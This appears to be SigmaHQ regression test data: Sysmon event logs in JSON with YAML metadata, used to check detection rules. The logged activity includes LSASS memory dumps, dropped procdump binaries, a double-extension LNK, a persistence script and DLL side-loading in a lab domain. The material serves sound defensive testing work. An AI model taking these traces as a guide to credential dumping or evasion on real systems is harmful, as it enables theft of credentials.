"CreationUtcTime": "2025-10-24 23:41:00.589",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml
================================================
id: 61017761-38ab-4224-a43f-6cc53b67e374
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 13c02350-4177-4e45-ac17-cf7ca628ff5e
title: Files With System DLL Name In Unsuspected Locations
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:41:48.497170Z"
}
},
"EventRecordID": 24322,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:41:48.482",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\bitsadmin.exe",
"CreationUtcTime": "2025-10-24 23:41:48.482",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/info.yml
================================================
id: e0123384-7d25-4178-b011-c1d37394d8dc
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d
title: Files With System Process Name In Unsuspected Locations
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:43:34.136421Z"
}
},
"EventRecordID": 26359,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:43:34.134",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe",
"CreationUtcTime": "2025-10-24 23:43:34.134",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:43:34.154339Z"
}
},
"EventRecordID": 26362,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:43:34.145",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe:Zone.Identifier",
"CreationUtcTime": "2022-11-03 15:55:14.000",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:43:34.160852Z"
}
},
"EventRecordID": 26366,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:43:34.145",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe",
"CreationUtcTime": "2025-10-24 23:43:34.145",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:43:34.177439Z"
}
},
"EventRecordID": 26369,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:43:34.177",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe:Zone.Identifier",
"CreationUtcTime": "2022-11-03 15:55:14.000",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:43:34.183790Z"
}
},
"EventRecordID": 26373,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:43:34.178",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe",
"CreationUtcTime": "2025-10-24 23:43:34.178",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:43:34.211790Z"
}
},
"EventRecordID": 26376,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:43:34.209",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier",
"CreationUtcTime": "2022-11-03 15:55:14.000",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml
================================================
id: ef67d58b-a7c2-434f-af87-34ae280a2968
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 8fbf3271-1ef6-4e94-8210-03c2317947f6
title: Cred Dump Tools Dropped Files
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:45:24.807660Z"
}
},
"EventRecordID": 28881,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:45:24.804",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\lsass.dmp",
"CreationUtcTime": "2025-10-24 23:45:24.804",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml
================================================
id: 5640730a-30d1-4aca-9ad3-dbb9000bb091
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c
title: Potentially Suspicious DMP/HDMP File Creation
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-10T05:14:28.844323Z"
}
},
"EventRecordID": 18792,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "Public",
"UtcTime": "2025-12-10 05:14:28.840",
"ProcessGuid": "0197231E-01A8-6939-0811-000000000800",
"ProcessId": 8868,
"Image": "C:\\WINDOWS\\system32\\certutil.exe",
"TargetFilename": "C:\\Users\\Public\\7zip.exe",
"CreationUtcTime": "2025-12-10 05:14:28.840",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml
================================================
id: 27565138-af8e-4c92-956e-586bbc0a3539
description: N/A
date: 2025-12-10
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67
title: Legitimate Application Writing Files In Uncommon Location
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:54:01.546728Z"
}
},
"EventRecordID": 86290,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:54:01.546",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\evil.doc.lnk",
"CreationUtcTime": "2025-10-24 23:54:01.546",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml
================================================
id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 3215aa19-f060-4332-86d5-5602511f3ca8
title: Suspicious LNK Double Extension File Created
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:52:38.278829Z"
}
},
"EventRecordID": 74174,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:52:38.276",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\Users\\Public\\persistence.bat",
"CreationUtcTime": "2025-10-24 23:52:38.276",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml
================================================
id: 9556b96b-462a-4238-a0bf-5e11ff0408fe
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e
title: Suspicious Binaries and Scripts in Public Folder
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:51:54.709878Z"
}
},
"EventRecordID": 67705,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:51:54.705",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\RECYCLERS.BIN\\malware.exe",
"CreationUtcTime": "2025-10-24 23:51:54.705",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml
================================================
id: 6d485a4e-83d1-4ead-8173-9fddddb3ba22
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca
title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:50:20.590884Z"
}
},
"EventRecordID": 53968,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:50:20.576",
"ProcessGuid": "5AA13A44-10B3-68FC-4E1E-000000004002",
"ProcessId": 2956,
"Image": "C:\\Windows\\system32\\taskmgr.exe",
"TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP",
"CreationUtcTime": "2025-10-24 23:50:20.576",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml
================================================
id: 55db307d-4a36-4594-bea8-7d114714d3b4
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 69ca12af-119d-44ed-b50f-a47af0ebc364
title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx
================================================
FILE: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 7,
"Version": 3,
"Level": 4,
"Task": 7,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-02-04T08:43:28.342637Z"
}
},
"EventRecordID": 715282,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 776,
"ThreadID": 4352
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-02-04 08:43:28.234",
"ProcessGuid": "14207D89-06B0-6983-CF01-000000004402",
"ProcessId": 6672,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\fsquirt.exe",
"ImageLoaded": "C:\\Users\\SwachchhandaP\\Downloads\\bthprops.cpl",
"FileVersion": "-",
"Description": "-",
"Product": "-",
"Company": "-",
"OriginalFileName": "-",
"Hashes": "MD5=221877743CF329314E571E9398EFCA70,SHA256=863390BB749E466975A6A5330CCD077C846E1F387AAE0327AFFE33DF87153E67,IMPHASH=7FF91A855D5B3D338EB5B4CE63698F4A",
"Signed": "false",
"Signature": "-",
"SignatureStatus": "Unavailable",
"User": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/info.yml
================================================
id: 8ee57597-baba-46bd-8a61-85ff51f7aab6
description: N/A
date: 2026-02-04
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 2b140a5c-dc02-4bb8-b6b1-8bdb45714cde
title: System Control Panel Item Loaded From Uncommon Location
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location/2b140a5c-dc02-4bb8-b6b1-8bdb45714cde.evtx
================================================
FILE: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 7,
"Version": 3,
"Level": 4,
"Task": 7,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T07:57:32.309580Z"
}
},
"EventRecordID": 676402,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 07:57:32.308",
"ProcessGuid": "0197231E-046C-6928-160C-000000000D00",
"ProcessId": 296,
"Image": "C:\\Users\\Public\\wsass\\WerFaultSecure.exe",
"ImageLoaded": "C:\\Windows\\System32\\dbgcore.dll",
"FileVersion": "10.0.26100.7019 (WinBuild.160101.0800)",
"Description": "Windows Core Debugging Helpers",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "DBGCORE.DLL",
"Hashes": "SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C",
"Signed": "true",
"Signature": "Microsoft Windows",
"SignatureStatus": "Valid",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml
================================================
id: bc1c627e-6529-459d-9bd6-74ffb88b3320
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 416bc4a2-7217-4519-8dc7-c3271817f1d5
title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/416bc4a2-7217-4519-8dc7-c3271817f1d5.evtx
================================================
FILE: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/9f5c1d59-33be-4e60-bcab-85d2f566effd.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 10,
"Version": 3,
"Level": 4,
"Task": 10,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T07:57:32.317336Z"
}
},
"EventRecordID": 676404,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 07:57:32.315",
"SourceProcessGUID": "0197231E-046C-6928-160C-000000000D00",
"SourceProcessId": 296,
"SourceThreadId": 5260,
"SourceImage": "C:\\Users\\Public\\wsass\\WerFaultSecure.exe",
"TargetProcessGUID": "0197231E-2DD5-691E-0C00-000000000D00",
"TargetProcessId": 860,
"TargetImage": "C:\\WINDOWS\\system32\\lsass.exe",
"GrantedAccess": "0x1fffff",
"CallTrace": "C:\\WINDOWS\\SYSTEM32\\ntdll.dll+16bcc4|C:\\WINDOWS\\SYSTEM32\\ntdll.dll+17aee0|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+7f7dc|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+c8d28|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+44c34|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+48f2c|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+3d414|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+29c7c|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+2a1f0|C:\\WINDOWS\\SYSTEM32\\dbgcore.DLL+4f894|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+3a64|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+2576|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+20c9|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+1a0b|C:\\Users\\Public\\wsass\\WerFaultSecure.exe+48cc|C:\\WINDOWS\\SYSTEM32\\KERNEL32.DLL+f17ac",
"SourceUser": "swachchhanda\\xodih",
"TargetUser": "NT AUTHORITY\\SYSTEM"
}
}
}
================================================
FILE: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml
================================================
id: f0a580dc-386c-4049-8ca4-cef9f956dc4c
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 9f5c1d59-33be-4e60-bcab-85d2f566effd
title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs
